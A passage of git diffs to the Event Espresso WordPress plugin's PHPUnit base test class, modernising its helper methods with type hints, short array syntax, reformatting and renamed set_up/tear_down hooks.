      * @param string $option_name
      */
-    public function assertWPOptionExists($option_name)
+    public function assertWPOptionExists(string $option_name)
     {
-        $option = get_option($option_name, NULL);
+        $option = get_option($option_name, null);
         if ($option) {
             $this->assertTrue(true);
         } else {
-            $this->assertNotNull($option, sprintf(esc_html__('The WP Option "%s" does not exist but should', 'event_espresso'), $option_name));
+            $this->assertNotNull(
+                $option,
+                sprintf(
+                    esc_html__('The WP Option "%s" does not exist but should', 'event_espresso'),
+                    $option_name
+                )
+            );
         }
     }
 
 
     /**
-     * @param $option_name
+     * @param string $option_name
      */
-    public function assertWPOptionDoesNotExist($option_name)
+    public function assertWPOptionDoesNotExist(string $option_name)
     {
-        $option = get_option($option_name, NULL);
+        $option = get_option($option_name, null);
         if ($option) {
-            $this->assertNull($option, sprintf(esc_html__('The WP Option "%s" exists but shouldn\'t', 'event_espresso'), $option_name));
+            $this->assertNull(
+                $option,
+                sprintf(
+                    esc_html__('The WP Option "%s" exists but shouldn\'t', 'event_espresso'),
+                    $option_name
+                )
+            );
         } else {
             $this->assertTrue(true);
         }
     }
 
 
-
     /**
-     * Compares two EE model objects by just looking at their field's values. If you want strict comparison just use ordinary '==='.
-     * If you pass it two arrays of EE objects, that works too
+     * Compares two EE model objects by just looking at their field's values. If you want strict comparison just use
+     * ordinary '==='. If you pass it two arrays of EE objects, that works too
      *
      * @param EE_Base_Class|EE_Base_Class[] $expected_object
      * @param EE_Base_Class|EE_Base_Class[] $actual_object
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function assertEEModelObjectsEquals($expected_object, $actual_object)
     {
@@ -895,7 +934,10 @@ class EE_UnitTestCase extends WP_UnitTestCase
                 if ($expected_value !== $actual_value) {
                     $this->fail(
                         sprintf(
-                            esc_html__('EE objects for the field %4$s of class "%1$s" did not match. They were: %2$s and %3$s.  The values for the field were %5$s and %6$s', 'event_espresso'),
+                            esc_html__(
+                                'EE objects for the field %4$s of class "%1$s" did not match. They were: %2$s and %3$s.  The values for the field were %5$s and %6$s',
+                                'event_espresso'
+                            ),
                             get_class($expected_object),
                             print_r($expected_object->model_field_array(), true),
                             print_r($actual_object->model_field_array(), true),
@@ -909,6 +951,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
         }
     }
 
+
     /**
      * Compares HTML, ignoring whitespace differences; also tries to make differences
      * more obvious for comparison in PHPUnit results.
@@ -916,32 +959,35 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * Eg, ignore case differences,unnecessary whitespace differences (eg '< br >' vs '<br>'),
      * attribute order differences, so this would only fail when there would be a noticeable
      * difference. The true ideal would be system testing using something codeception or something
+     *
      * @param string $expected
      * @param string $actual
      * @param string $error_message
      * @return void
      */
-    public function assertHTMLEquals($expected, $actual, $error_message = '')
+    public function assertHTMLEquals(string $expected, string $actual, string $error_message = '')
     {
         $expected_standardized_whitespace = preg_replace('~(\\s)+~', PHP_EOL, $expected);
-        $actual_standardized_whitespace = preg_replace('~(\\s)+~', PHP_EOL, $actual);
+        $actual_standardized_whitespace   = preg_replace('~(\\s)+~', PHP_EOL, $actual);
         $this->assertEquals($expected_standardized_whitespace, $actual_standardized_whitespace, $error_message);
     }
 
 
     /**
      *Creates a model object and its required dependencies
-     * @param string $model_name
-     * @param array $args array of arguments to supply when constructing the model object
-     * @param boolean $save
-     * @throws EE_Error
-     * @global int $auto_made_thing_seed
+     *
+     * @param string     $model_name
+     * @param array|null $args array of arguments to supply when constructing the model object
+     * @param bool|null  $save
      * @return EE_Base_Class
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @global int       $auto_made_thing_seed
      */
-    public function new_model_obj_with_dependencies($model_name, $args = array(), $save = true)
-    {
+    public function new_model_obj_with_dependencies(string $model_name, ?array $args = [], ?bool $save = true):
+    EE_Base_Class {
         global $auto_made_thing_seed;
-        if ($auto_made_thing_seed === NULL) {
+        if ($auto_made_thing_seed === null) {
             $auto_made_thing_seed = 1;
         }
         $model = EE_Registry::instance()->load_model($model_name);
@@ -952,9 +998,9 @@ class EE_UnitTestCase extends WP_UnitTestCase
                 continue;
             } elseif ($related_model_name === 'WP_User' && get_current_user_id()) {
                 $fk = $model->get_foreign_key_to($related_model_name);
-                if (! isset($args[$fk->get_name()])) {
-                    $obj = EEM_WP_User::instance()->get_one_by_ID(get_current_user_id());
-                    $args[$fk->get_name()] = $obj->ID();
+                if (! isset($args[ $fk->get_name() ])) {
+                    $obj                     = EEM_WP_User::instance()->get_one_by_ID(get_current_user_id());
+                    $args[ $fk->get_name() ] = $obj->ID();
                 }
             } elseif ($related_model_name === 'Country' && ! isset($args['CNT_ISO'])) {
                 //we already have lots of countries. lets not make any more
@@ -964,9 +1010,9 @@ class EE_UnitTestCase extends WP_UnitTestCase
                 $args['CNT_ISO'] = 'US';
             } elseif ($related_model_name === 'Status') {
                 $fk = $model->get_foreign_key_to($related_model_name);
-                if (!isset($args[$fk->get_name()])) {
+                if (! isset($args[ $fk->get_name() ])) {
                     //only set the default if they haven't specified anything
-                    $args[$fk->get_name()] = $fk->get_default_value();
+                    $args[ $fk->get_name() ] = $fk->get_default_value();
                 }
             } elseif ($relation instanceof EE_Belongs_To_Relation) {
                 // despite Venue being added as an EE_Belongs_To_Relation to both the Event and Datetime models,
@@ -975,19 +1021,19 @@ class EE_UnitTestCase extends WP_UnitTestCase
                     continue;
                 }
                 $fk = $model->get_foreign_key_to($related_model_name);
-                if (!isset($args[$fk->get_name()])) {
-                    $obj = $this->new_model_obj_with_dependencies($related_model_name);
-                    $args[$fk->get_name()] = $obj->ID();
+                if (! isset($args[ $fk->get_name() ])) {
+                    $obj                     = $this->new_model_obj_with_dependencies($related_model_name);
+                    $args[ $fk->get_name() ] = $obj->ID();
                 }
             }
         }
         //set any other fields which haven't yet been set
         foreach ($model->field_settings() as $field_name => $field) {
-            $value = NULL;
+            $value = null;
             if (
                 in_array(
                     $field_name,
-                    array(
+                    [
                         'EVT_timezone_string',
                         'PAY_redirect_url',
                         'PAY_redirect_args',
@@ -998,39 +1044,39 @@ class EE_UnitTestCase extends WP_UnitTestCase
                         'QST_system',
                         'QSG_system',
                         'QSO_system',
-                        'password'
-                    ),
+                        'password',
+                    ],
                     true
                 )
             ) {
-                $value = NULL;
+                $value = null;
             } elseif (
-                $field_name === 'TKT_start_date' ||
-                $field_name === 'DTT_EVT_start'
+                $field_name === 'TKT_start_date' || $field_name === 'DTT_EVT_start'
             ) {
                 $value = time() + MONTH_IN_SECONDS;
             } elseif (
-                $field_name === 'TKT_end_date' ||
-                $field_name === 'DTT_EVT_end'
+                $field_name === 'TKT_end_date' || $field_name === 'DTT_EVT_end'
             ) {
                 $value = time() + MONTH_IN_SECONDS + DAY_IN_SECONDS;
             } elseif (
-                $field instanceof EE_Enum_Integer_Field ||
-                $field instanceof EE_Enum_Text_Field ||
-                $field instanceof EE_Boolean_Field ||
-                $field_name === 'PMD_type' ||
-                $field_name === 'CNT_cur_dec_mrk' ||
-                $field_name === 'CNT_cur_thsnds' ||
-                $field_name === 'CNT_tel_code'
+                $field instanceof EE_Enum_Integer_Field || $field instanceof EE_Enum_Text_Field
+                || $field
+                   instanceof
+                   EE_Boolean_Field
+                || $field_name === 'PMD_type'
+                || $field_name === 'CNT_cur_dec_mrk'
+                || $field_name === 'CNT_cur_thsnds'
+                || $field_name === 'CNT_tel_code'
             ) {
                 $value = $field->get_default_value();
             } elseif (
-                $field instanceof EE_Integer_Field ||
-                $field instanceof EE_Float_Field ||
-                $field instanceof EE_Foreign_Key_Field_Base ||
-                $field_name === 'STA_abbrev' ||
-                $field_name === 'CNT_ISO3' ||
-                $field_name === 'CNT_cur_code'
+                $field instanceof EE_Integer_Field || $field instanceof EE_Float_Field
+                || $field
+                   instanceof
+                   EE_Foreign_Key_Field_Base
+                || $field_name === 'STA_abbrev'
+                || $field_name === 'CNT_ISO3'
+                || $field_name === 'CNT_cur_code'
             ) {
                 $value = $auto_made_thing_seed;
             } elseif ($field instanceof EE_Primary_Key_String_Field) {
@@ -1040,16 +1086,17 @@ class EE_UnitTestCase extends WP_UnitTestCase
             } elseif ($field instanceof EE_Text_Field_Base) {
                 $value = $auto_made_thing_seed . "_" . $field_name;
             }
-            if (!array_key_exists($field_name, $args) && $value !== NULL) {
-                $args[$field_name] = $value;
+            if (! array_key_exists($field_name, $args) && $value !== null) {
+                $args[ $field_name ] = $value;
             }
         }
-        //and finally make the model obj
+        // and finally make the model obj
+        /** @var EE_Base_Class $classname */
         $classname = 'EE_' . $model_name;
         $model_obj = $classname::new_instance($args);
         if ($save) {
             $success = $model_obj->save();
-            if (!$success) {
+            if (! $success) {
                 global $wpdb;
                 throw new EE_Error(
                     sprintf(
@@ -1063,42 +1110,51 @@ class EE_UnitTestCase extends WP_UnitTestCase
         }
         $auto_made_thing_seed++;
         return $model_obj;
-
     }
 
 
     /**
      * asserts that a table (even temporary one) exists
-     * We really should implement this function in the proper PHPunit style
+     * We really should implement this function in the proper PHPUnit style
+     *
      * @see http://php-and-symfony.matthiasnoback.nl/2012/02/phpunit-writing-a-custom-assertion/
-     * @global WPDB $wpdb
      * @param string $table_name with or without $wpdb->prefix
      * @param string $model_name the model's name (only used for error reporting)
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @global WPDB  $wpdb
      */
-    public function assertTableExists($table_name, $model_name = 'Unknown')
+    public function assertTableExists(string $table_name, string $model_name = 'Unknown')
     {
-        $table_analysis = EE_Registry::instance()->create('TableAnalysis', array(), true);
-        if (!$table_analysis->tableExists($table_name)) {
+        $table_analysis = EE_Registry::instance()->create('TableAnalysis', [], true);
+        if (! $table_analysis->tableExists($table_name)) {
             global $wpdb;
             $this->fail($wpdb->last_error);
         }
     }
 
+
     /**
      * Asserts the table (even temporary one) does not exist
-     * We really should implement this function in the proper PHPunit style
+     * We really should implement this function in the proper PHPUnit style
+     *
      * @see http://php-and-symfony.matthiasnoback.nl/2012/02/phpunit-writing-a-custom-assertion/
-     * @global WPDB $wpdb
      * @param string $table_name with or without $wpdb->prefix
      * @param string $model_name the model's name (only used for error reporting)
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @global WPDB  $wpdb
      */
-    public function assertTableDoesNotExist($table_name, $model_name = 'Unknown')
+    public function assertTableDoesNotExist(string $table_name, string $model_name = 'Unknown')
     {
-        $table_analysis = EE_Registry::instance()->create('TableAnalysis', array(), true);
+        $table_analysis = EE_Registry::instance()->create('TableAnalysis', [], true);
         if ($table_analysis->tableExists($table_name)) {
             $this->fail(
                 sprintf(
-                    esc_html__('Table like %1$s SHOULD NOT exist. It was apparently defined on the model "%2$s"', 'event_espresso'),
+                    esc_html__(
+                        'Table like %1$s SHOULD NOT exist. It was apparently defined on the model "%2$s"',
+                        'event_espresso'
+                    ),
                     $table_name,
                     $model_name
                 )
@@ -1106,10 +1162,12 @@ class EE_UnitTestCase extends WP_UnitTestCase
         }
     }
 
+
     /**
      * Modifies the $wp_actions global to make it look like certain actions were and weren't
      * performed, so that EE_Register_Addon is deceived into thinking it's the right
      * time to register an addon etc
+     *
      * @global array $wp_actions
      */
     protected function _pretend_addon_hook_time()
@@ -1124,68 +1182,62 @@ class EE_UnitTestCase extends WP_UnitTestCase
         $wp_actions['AHEE__EE_System__load_espresso_addons'] = 1;
     }
 
+
     /**
      * Restores the $wp_actions global to how ti should have been before we
      * started pretending we hooked in at the right time etc
+     *
      * @global array $wp_actions
      */
     protected function _stop_pretending_addon_hook_time()
     {
         global $wp_actions;
-        $wp_actions['AHEE__EE_System__load_espresso_addons'] = 1;
+        $wp_actions['AHEE__EE_System__load_espresso_addons']                    = 1;
         $wp_actions['AHEE__EE_System___detect_if_activation_or_upgrade__begin'] = 1;
-        $wp_actions['FHEE__EE_System__parse_model_names'] = 1;
-        $wp_actions['FHEE__EE_System__parse_implemented_model_names'] = 1;
+        $wp_actions['FHEE__EE_System__parse_model_names']                       = 1;
+        $wp_actions['FHEE__EE_System__parse_implemented_model_names']           = 1;
     }
-
 
 
     /**
      * Makes a complete transaction record with all associated data (ie, its line items,
      * registrations, tickets, datetimes, events, attendees, questions, answers, etc).
      *
-     * @param array $options         {
-     * 	@type int    $ticket_types/$tickets    the number of different ticket types in this transaction. Default 1
-     * 	@type int    $taxable_tickets how many of those ticket types should be taxable. Default EE_INF
-     * @type int fixed_ticket_price_modifiers the number of fixed ticket price modifiers to use on the tickets. Defaults to 1.
-     * @type string $reg_status the status of the transaction's registration. Defaults to "RAP"
-     * @type boolean $setup_reg whether to add a registration or not onto the transaction. Defaults to true
-     * @type int $tkt_qty the number of tickest available for purchase that the transaction is for
-     * @type string/int/Datetime $timestamp to use on the transaction and registration and payments etc
-     * }
+     * @param array $options {
      * @return EE_Transaction
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    protected function new_typical_transaction($options = array())
+    protected function new_typical_transaction(array $options = []): EE_Transaction
     {
-        $ticket_types = $options['ticket_types'] ?? 1;
+        $ticket_types    = $options['ticket_types'] ?? 1;
         $taxable_tickets = $options['taxable_tickets'] ?? EE_INF;
-        $reg_status = $options['reg_status'] ?? EEM_Registration::status_id_approved;
-        $setup_reg = $options['setup_reg'] ?? true;
-        $tkt_qty = $options['tkt_qty'] ?? 1;
-        $ticket_types = isset($options['tickets'])
+        $reg_status      = $options['reg_status'] ?? EEM_Registration::status_id_approved;
+        $setup_reg       = $options['setup_reg'] ?? true;
+        $tkt_qty         = $options['tkt_qty'] ?? 1;
+        $ticket_types    = isset($options['tickets'])
             ? count($options['tickets'])
             : $ticket_types;
-        $timestamp = $options['timestamp'] ?? current_time('timestamp');
+        $timestamp       = $options['timestamp'] ?? current_time('timestamp');
         /** @var EE_Transaction $txn */
-        $txn = $this->new_model_obj_with_dependencies(
+        $txn             = $this->new_model_obj_with_dependencies(
             'Transaction',
-            array(
-                'TXN_paid' => 0,
-                'TXN_timestamp' => $timestamp
-            )
+            [
+                'TXN_paid'      => 0,
+                'TXN_timestamp' => $timestamp,
+            ]
         );
         $total_line_item = EEH_Line_Item::create_total_line_item($txn);
         $total_line_item->save_this_and_descendants_to_txn($txn->ID());
-        $tickets = [];
+        $tickets           = [];
         $ticket_line_items = [];
         for ($i = 1; $i <= $ticket_types; $i++) {
             /** @var EE_Ticket $ticket */
-            if(isset($options['tickets'][$i])){
-                $ticket = $options['tickets'][$i];
+            if (isset($options['tickets'][ $i ])) {
+                $ticket = $options['tickets'][ $i ];
             } else {
                 $is_taxable = $taxable_tickets-- > 0;
-                $ticket = $this->new_ticket(
+                $ticket     = $this->new_ticket(
                     [
                         'TKT_price'    => $i * 10,
                         'TKT_qty'      => $tkt_qty,
@@ -1197,16 +1249,16 @@ class EE_UnitTestCase extends WP_UnitTestCase
                 );
             }
             $line_item = EEH_Line_Item::add_ticket_purchase($total_line_item, $ticket, $tkt_qty);
-            $this->assertInstanceOf( 'EE_Line_Item', $line_item );
-            $this->assertEquals($ticket->ID(), $line_item->OBJ_ID() );
-            $tickets[ $ticket->ID() ] = $ticket;
+            $this->assertInstanceOf('EE_Line_Item', $line_item);
+            $this->assertEquals($ticket->ID(), $line_item->OBJ_ID());
+            $tickets[ $ticket->ID() ]           = $ticket;
             $ticket_line_items[ $ticket->ID() ] = $line_item;
         }
 
         if ($setup_reg) {
             $reg_count = count($tickets);
-            $i = 0;
-            foreach ($tickets as $TKT_ID =>  $ticket) {
+            $i         = 0;
+            foreach ($tickets as $TKT_ID => $ticket) {
                 $i++;
                 $final_price = EEH_Line_Item::calculate_final_price_for_ticket_line_item(
                     $total_line_item,
@@ -1222,7 +1274,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
                         'REG_count'       => $i,
                         'REG_group_size'  => $reg_count,
                         'REG_final_price' => $final_price,
-                        'REG_date'        => $timestamp
+                        'REG_date'        => $timestamp,
                     ]
                 );
             }
@@ -1234,22 +1286,16 @@ class EE_UnitTestCase extends WP_UnitTestCase
     }
 
 
-
     /**
      * Creates an interesting ticket, with a base price, dollar surcharge, and a percent surcharge,
      * which is for 2 different datetimes.
      *
-     * @param array $options           {
-     * @type int    $dollar_surcharge  the dollar surcharge to add to this ticket
-     * @type int    $percent_surcharge teh percent surcharge to add to this ticket (value in percent, not in decimal. Eg if it's a 10% surcharge, enter 10.00, not 0.10
-     * @type int    $datetimes         the number of datetimes for this ticket,
-     * @type int    $TKT_price         set the TKT_price to this value.
-     * @type int    $TKT_taxable       set the TKT_taxable to this value.
-     *                                 }
+     * @param array $options {
      * @return EE_Ticket
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    public function new_ticket($options = array())
+    public function new_ticket(array $options = []): EE_Ticket
     {
         // copy incoming options to use for ticket args
         $ticket_args = $options;
@@ -1263,63 +1309,76 @@ class EE_UnitTestCase extends WP_UnitTestCase
             : true;
         //  make sure ticket start and end dates are set else they will default to NOW !!!
         $ticket_args['TKT_start_date'] = $options['TKT_start_date'] ?? time() + MONTH_IN_SECONDS;
-        $ticket_args['TKT_end_date'] = $options['TKT_end_date'] ?? time() + MONTH_IN_SECONDS + DAY_IN_SECONDS;
+        $ticket_args['TKT_end_date']   = $options['TKT_end_date'] ?? time() + MONTH_IN_SECONDS + DAY_IN_SECONDS;
         // now dump any other elements that came from the incoming options that are not ticket properties
         $ticket_args = array_intersect_key(
             $ticket_args,
-            array(
-                'TTM_ID' => 1,
-                'TKT_name' => 1,
+            [
+                'TTM_ID'          => 1,
+                'TKT_name'        => 1,
                 'TKT_description' => 1,
-                'TKT_start_date' => 1,
-                'TKT_end_date' => 1,
-                'TKT_min' => 1,
-                'TKT_max' => 1,
-                'TKT_price' => 1,
-                'TKT_sold' => 1,
-                'TKT_qty' => -1,
-                'TKT_reserved' => 1,
-                'TKT_uses' => 1,
-                'TKT_required' => 1,
-                'TKT_taxable' => 1,
-                'TKT_is_default' => 1,
-                'TKT_order' => 1,
-                'TKT_row' => 1,
-                'TKT_deleted' => 1,
-                'TKT_wp_user' => 1,
-                'TKT_parent' => 1,
-            )
+                'TKT_start_date'  => 1,
+                'TKT_end_date'    => 1,
+                'TKT_min'         => 1,
+                'TKT_max'         => 1,
+                'TKT_price'       => 1,
+                'TKT_sold'        => 1,
+                'TKT_qty'         => -1,
+                'TKT_reserved'    => 1,
+                'TKT_uses'        => 1,
+                'TKT_required'    => 1,
+                'TKT_taxable'     => 1,
+                'TKT_is_default'  => 1,
+                'TKT_order'       => 1,
+                'TKT_row'         => 1,
+                'TKT_deleted'     => 1,
+                'TKT_wp_user'     => 1,
+                'TKT_parent'      => 1,
+            ]
         );
         // \EEH_Debug_Tools::printr($ticket_args, '$ticket_args', __FILE__, __LINE__);
         // \EEH_Debug_Tools::printr($options, '$options', __FILE__, __LINE__);
         /** @type EE_Ticket $ticket */
-        $ticket = $this->new_model_obj_with_dependencies('Ticket',$ticket_args);
-        $base_price_type = EEM_Price_Type::instance()->get_one(array(array('PRT_name' => 'Base Price')));
+        $ticket          = $this->new_model_obj_with_dependencies('Ticket', $ticket_args);
+        $base_price_type = EEM_Price_Type::instance()->get_one([['PRT_name' => 'Base Price']]);
         $this->assertInstanceOf('EE_Price_Type', $base_price_type);
 
         //only associate on the tickets if TKT_price is not included
-        if (!isset($options['TKT_price'])) {
-            $base_price = $this->new_model_obj_with_dependencies('Price', array('PRC_amount' => 10, 'PRT_ID' => $base_price_type->ID()));
+        if (! isset($options['TKT_price'])) {
+            $base_price =
+                $this->new_model_obj_with_dependencies('Price', ['PRC_amount' => 10, 'PRT_ID' => $base_price_type->ID()]
+                );
             $ticket->_add_relation_to($base_price, 'Price');
             $this->assertArrayContains($base_price, $ticket->prices());
             if (isset($options['dollar_surcharge'])) {
-                $dollar_surcharge_price_type = EEM_Price_Type::instance()->get_one(array(array('PRT_name' => 'Dollar Surcharge')));
+                $dollar_surcharge_price_type =
+                    EEM_Price_Type::instance()->get_one([['PRT_name' => 'Dollar Surcharge']]);
                 $this->assertInstanceOf('EE_Price_Type', $dollar_surcharge_price_type);
-                $dollar_surcharge = $this->new_model_obj_with_dependencies('Price', array('PRC_amount' => $options['dollar_surcharge'], 'PRT_ID' => $dollar_surcharge_price_type->ID()));
+                $dollar_surcharge = $this->new_model_obj_with_dependencies(
+                    'Price',
+                    ['PRC_amount' => $options['dollar_surcharge'], 'PRT_ID' => $dollar_surcharge_price_type->ID()]
+                );
                 $ticket->_add_relation_to($dollar_surcharge, 'Price');
                 $this->assertArrayContains($dollar_surcharge, $ticket->prices());
             }
             if (isset($options['percent_surcharge'])) {
-                $percent_surcharge_price_type = EEM_Price_Type::instance()->get_one(array(array('PRT_name' => 'Percent Surcharge')));
+                $percent_surcharge_price_type =
+                    EEM_Price_Type::instance()->get_one([['PRT_name' => 'Percent Surcharge']]);
                 $this->assertInstanceOf('EE_Price_Type', $percent_surcharge_price_type);
-                $percent_surcharge = $this->new_model_obj_with_dependencies('Price', array('PRC_amount' => $options['percent_surcharge'], 'PRT_ID' => $percent_surcharge_price_type->ID()));
+                $percent_surcharge = $this->new_model_obj_with_dependencies(
+                    'Price',
+                    ['PRC_amount' => $options['percent_surcharge'], 'PRT_ID' => $percent_surcharge_price_type->ID()]
+                );
                 $ticket->_add_relation_to($percent_surcharge, 'Price');
                 $this->assertArrayContains($percent_surcharge, $ticket->prices());
             }
         } else {
             $ticket->set('TKT_price', $options['TKT_price']);
             //set the base price
-            $base_price = $this->new_model_obj_with_dependencies('Price', array('PRC_amount' => $options['TKT_price'], 'PRT_ID' => $base_price_type->ID()));
+            $base_price = $this->new_model_obj_with_dependencies(
+                'Price',
+                ['PRC_amount' => $options['TKT_price'], 'PRT_ID' => $base_price_type->ID()]
+            );
             $ticket->_add_relation_to($base_price, 'Price');
             $this->assertArrayContains($base_price, $ticket->prices());
         }
@@ -1329,7 +1388,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
         }
 
         // were datetimes (and their related events) already setup?
-        if(!empty($options['datetime_objects']) && is_array($options['datetime_objects'])) {
+        if (! empty($options['datetime_objects']) && is_array($options['datetime_objects'])) {
             foreach ($options['datetime_objects'] as $datetime_object) {
                 $ticket->_add_relation_to($datetime_object, 'Datetime');
             }
@@ -1341,15 +1400,15 @@ class EE_UnitTestCase extends WP_UnitTestCase
             global $current_user;
             // create new datetimes, default = 1
             $datetimes = $options['datetimes'] ?? 1;
-            $event = $this->new_model_obj_with_dependencies('Event', array('EVT_wp_user' => $current_user->ID));
+            $event     = $this->new_model_obj_with_dependencies('Event', ['EVT_wp_user' => $current_user->ID]);
             for ($i = 0; $i <= $datetimes; $i++) {
                 $ddt = $this->new_model_obj_with_dependencies(
                     'Datetime',
-                    array(
-                        'EVT_ID' => $event->ID(),
+                    [
+                        'EVT_ID'        => $event->ID(),
                         'DTT_EVT_start' => time() + MONTH_IN_SECONDS,
                         'DTT_EVT_end'   => time() + MONTH_IN_SECONDS + DAY_IN_SECONDS,
-                    )
+                    ]
                 );
                 $ticket->_add_relation_to($ddt, 'Datetime');
                 $this->assertArrayContains($ddt, $ticket->datetimes());
@@ -1367,9 +1426,8 @@ class EE_UnitTestCase extends WP_UnitTestCase
      *
      * @param array $ee_capabilities array of EE CAPS if you don't want the user to have ALL EE CAPS
      * @return WP_User
-     * @throws EE_Error
      */
-    public function wp_admin_with_ee_caps($ee_capabilities = array())
+    public function wp_admin_with_ee_caps(array $ee_capabilities = []): WP_User
     {
         //if caps were provided then just add the caps to a default user role (non admin user).
         if ($ee_capabilities) {
@@ -1380,9 +1438,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
             }
             return $user;
         }
-        /** @type WP_User $user */
-        $user = $this->factory->user->create_and_get(array('role' => 'administrator'));
-        return $user;
+        return $this->factory->user->create_and_get(['role' => 'administrator']);
     }
 
 
@@ -1392,8 +1448,9 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @param EE_ticket $ticket
      * @param int       $qty
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    public function simulate_x_number_ticket_sales(EE_ticket $ticket, $qty = 1)
+    public function simulate_x_number_ticket_sales(EE_ticket $ticket, int $qty = 1)
     {
         $ticket->increaseSold($qty);
     }
@@ -1403,18 +1460,19 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * decrements the ticket and datetime sold values
      *
      * @param EE_ticket $ticket
-     * @param int $qty
+     * @param int       $qty
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    public function reverse_x_number_ticket_sales(EE_ticket $ticket, $qty = 1)
+    public function reverse_x_number_ticket_sales(EE_ticket $ticket, int $qty = 1)
     {
         $ticket->decreaseSold($qty);
     }
 
 
-
     /**
      * Calls the WordPress version specific method for refreshing user roles during tests
+     *
      * @param WP_User $user
      */
     protected function refreshRolesForUser(WP_User $user)
@@ -1436,7 +1494,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @param null   $code
      * @throws \PHPUnit\Framework\Exception
      */
-    public function setExceptionExpected($exception, $code = null)
+    public function setExceptionExpected(string $exception, $code = null)
     {
         if (method_exists($this, 'expectException')) {
             parent::expectException($exception);
@@ -1454,10 +1512,10 @@ class EE_UnitTestCase extends WP_UnitTestCase
         // load, register, and add shortcodes the new way
         $this->loader->getShared(
             'EventEspresso\core\services\shortcodes\ShortcodesManager',
-            array(
+            [
                 // and the old way, but we'll put it under control of the new system
-                EE_Config::getLegacyShortcodesManager()
-            )
+                EE_Config::getLegacyShortcodesManager(),
+            ]
         );
         do_action('AHEE__EE_System__register_shortcodes_modules_and_widgets');
         do_action('AHEE__EE_System__core_loaded_and_ready');
@@ -1474,10 +1532,10 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @param bool     $is_action
      * @since 4.10.7.p
      */
-    protected function assertHookIsSet($hook_name, callable $callback, $equals, $is_action = true)
+    protected function assertHookIsSet(string $hook_name, callable $callback, $equals, bool $is_action = true)
     {
         $has_hook = $is_action ? 'has_action' : 'has_filter';
-        $actual = $has_hook($hook_name, $callback);
+        $actual   = $has_hook($hook_name, $callback);
         if ($actual === false) {
             // produces error message like:
             // The `EE_Admin::filter_plugin_actions()` callback is NOT registered to the "plugin_action_links" action when it should be.
@@ -1510,7 +1568,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @param bool|int $priority
      * @since 4.10.7.p
      */
-    protected function assertActionSet($action, callable $callback, $priority = true)
+    protected function assertActionSet(string $action, callable $callback, $priority = true)
     {
         $this->assertHookIsSet($action, $callback, $priority);
     }
@@ -1521,7 +1579,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @param callable $callback
      * @since 4.10.7.p
      */
-    protected function assertActionNotSet($action, callable $callback)
+    protected function assertActionNotSet(string $action, callable $callback)
     {
         $this->assertHookIsSet($action, $callback, false);
     }
@@ -1533,7 +1591,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @param bool|int $priority
      * @since 4.10.7.p
      */
-    protected function assertFilterSet($filter, callable $callback, $priority = true)
+    protected function assertFilterSet(string $filter, callable $callback, $priority = true)
     {
         $this->assertHookIsSet($filter, $callback, $priority, false);
     }
@@ -1544,7 +1602,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
      * @param callable $callback
      * @since 4.10.7.p
      */
-    protected function assertFilterNotSet($filter, callable $callback)
+    protected function assertFilterNotSet(string $filter, callable $callback)
     {
         $this->assertHookIsSet($filter, $callback, false, false);
     }
@@ -1561,7 +1619,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
 
     public function assertEspressoErrorsGenerated($msg = '')
     {
-        $msg = $msg ?: esc_html__('An EE_Error SHOULD have been generated but was not!', 'event_espresso');
+        $msg     = $msg ?: esc_html__('An EE_Error SHOULD have been generated but was not!', 'event_espresso');
         $notices = EE_Error::get_notices(false);
         EE_Error::reset_notices();
         $this->assertNotEmpty($notices['errors'], $msg);

--- a/tests/includes/EE_UnitTestCase.class.php
+++ b/tests/includes/EE_UnitTestCase.class.php
@@ -85,13 +85,13 @@ class EE_UnitTestCase extends WP_UnitTestCase
     //  * basically used for displaying the test case class while tests are running.
     //  * this can be helpful if you are getting weird errors happening,
     //  * but the test name is not being reported anywhere.
-    //  * Just uncomment this method as well as the first line of setUp() below.
+    //  * Just uncomment this method as well as the first line of set_up() below.
     //  *
     //  * @throws \EE_Error
     //  */
-    // public static function setUpBeforeClass() {
+    // public static function set_up_before_class() {
     //     echo "\n\n\n" . get_called_class() . "\n\n";
-    //     parent::setUpBeforeClass();
+    //     parent::set_up_before_class();
     //     // \EventEspresso\core\services\Benchmark::startTimer(get_called_class());
     // }
 
@@ -102,7 +102,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
     // }
 
 
-    public function setUp()
+    public function set_up()
     {
         // echo "\n\n" . strtoupper($this->getName()) . '()';
         //save the hooks state before WP_UnitTestCase actually gets its hands on it...
@@ -115,7 +115,7 @@ class EE_UnitTestCase extends WP_UnitTestCase
             'wp_current_filter' => $wp_current_filter
         );
         $this->_orig_current_user = $current_user instanceof WP_User ? clone $current_user : new WP_User(1);
-        parent::setUp();
+        parent::set_up();
         $auto_made_thing_seed = 1;
         //reset wpdb's list of queries executed so it only stores those from the current test
         $wpdb->queries = array();
@@ -171,9 +171,9 @@ class EE_UnitTestCase extends WP_UnitTestCase
         return true;
     }
 
-    public function tearDown()
+    public function tear_down()
     {
-        parent::tearDown();
+        parent::tear_down();
         $addon_count = count(EE_Registry::instance()->addons);
         if ($addon_count) {
             foreach (EE_Registry::instance()->addons as $addon) {

--- a/tests/includes/EE_UnitTestCase.class.php
+++ b/tests/includes/EE_UnitTestCase.class.php
@@ -1420,10 +1420,10 @@ class EE_UnitTestCase extends WP_UnitTestCase
         foreach ($ticket_args as $prop => $value) {
             switch ($prop) {
                 case 'TKT_start_date':
-                    $this->assertEquals($value, $ticket->start_date('U', null));
+                    $this->assertEquals($value, trim($ticket->start_date('U', null)));
                     break;
